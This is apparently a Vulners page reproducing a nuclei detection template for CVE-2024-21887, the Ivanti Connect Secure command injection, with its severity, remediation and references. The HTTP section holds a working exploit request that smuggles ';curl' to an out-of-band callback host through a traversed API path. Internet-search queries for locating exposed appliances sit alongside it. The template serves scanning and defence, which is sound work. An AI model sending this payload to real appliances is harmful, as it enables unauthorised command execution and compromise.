Lucene search
K

Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 84 Views

Ivanti Connect Secure and Policy Secure Command Injection (CVE-2024-21887) allows authenticated admins to execute arbitrary commands

Related
Refs
Code
id: CVE-2024-21887

info:
  name: Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection
  author: pdresearch,parthmalhotra,iamnoooob
  severity: critical
  description: A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x)  allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.
  impact: |
    Authenticated administrators can execute arbitrary OS commands on the Ivanti appliance, leading to complete system compromise.
  remediation: |
    Update Ivanti Connect Secure and Policy Secure to versions 9.1R14.4, 9.1R17.2, 9.1R18.3, 22.4R2.2, 22.5R1.1 or later.
  reference:
    - https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
    - http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html
    - https://github.com/farukokutan/Threat-Intelligence-Research-Reports
    - https://github.com/lions2012/Penetration_Testing_POC
    - https://github.com/Chocapikk/CVE-2024-21887
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2024-21887
    cwe-id: CWE-77
    epss-score: 0.99999
    epss-percentile: 1
    cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ivanti
    product: connect_secure
    shodan-query:
      - "html:\"welcome.cgi?p=logo\""
      - http.title:"ivanti connect secure"
      - http.html:"welcome.cgi?p=logo"
    fofa-query:
      - body="welcome.cgi?p=logo"
      - title="ivanti connect secure"
    google-query: intitle:"ivanti connect secure"
  tags: packetstorm,cve,cve2024,kev,rce,ivanti,vkev,vuln

http:
  - raw:
      - |
        GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: header
        words:
          - 'application/json'

      - type: word
        part: body
        words:
          - '"result":'
          - '"message":'
        condition: and
# digest: 4a0a0047304502207bc072d719628df779fed100f1a61ac962e9f998b0b17cc24cd594c6a22caf31022100b5dc25a4031a91e0dc2dd3553a88151ccc8c382f73a9c91576fc618a485bc1a4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
9High risk
Vulners AI Score9
CVSS 3.19.1
CVSS 39.1
EPSS0.99999
SSVC
84